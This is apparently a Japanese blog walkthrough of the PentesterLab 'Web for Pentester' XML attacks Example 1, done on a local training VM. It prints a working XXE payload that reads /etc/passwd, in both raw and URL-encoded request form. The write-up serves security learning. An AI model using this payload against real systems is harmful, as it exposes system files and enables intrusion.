Shikata Ga Nai

Private? There is no such things.

PentesterLabでXML attacksのExample1をやってみた

Hello there, ('ω')ノ

 

まずは、PentesterLabにアクセスして。

 https://pentesterlab.com/exercises/web_for_pentester/course

 

f:id:ThisIsOne:20210115135242p:plain

 

ISOファイルをダウンロードして。

 https://pentesterlab.com/exercises/web_for_pentester/attachments

 

f:id:ThisIsOne:20210115135341p:plain

 

仮想環境を構築して、起動したらIPアドレスを確認して。

 

f:id:ThisIsOne:20210115140752p:plain

 

IPアドレスにアクセスして。


f:id:ThisIsOne:20210115140617p:plain

 

 

XML attacksのExample1を選択すると。

 

f:id:ThisIsOne:20210115143011p:plain

 

リクエスト内容をBurpSuiteで確認して。

 

f:id:ThisIsOne:20210115143544p:plain

 

下記のXML用ペイロードを。

 

 <!DOCTYPE data [<!ENTITY file SYSTEM "file:///etc/passwd">]><data>&file;</data>

 

パラメータとして入力すると、うまくいかず。

 

 http://192.168.1.80/xml/example1.php?xml= data [<!ENTITY file SYSTEM "file:///etc/passwd">]><data>&file;</data>

 

f:id:ThisIsOne:20210115142810p:plain

 

下記サイトで、パラメータをURLエンコードして。

 https://meyerweb.com/eric/tools/dencoder/

 

f:id:ThisIsOne:20210115142652p:plain

 

再度、実行するとファイルの内容を取得できた。


 http://192.168.1.80/xml/example1.php?xml=%3C!DOCTYPE%20data%20%5B%3C!ENTITY%20file%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%5D%3E%3Cdata%3E%26file%3B%3C%2Fdata%3E

 

f:id:ThisIsOne:20210115142530p:plain

 

Best regards, (^^ゞ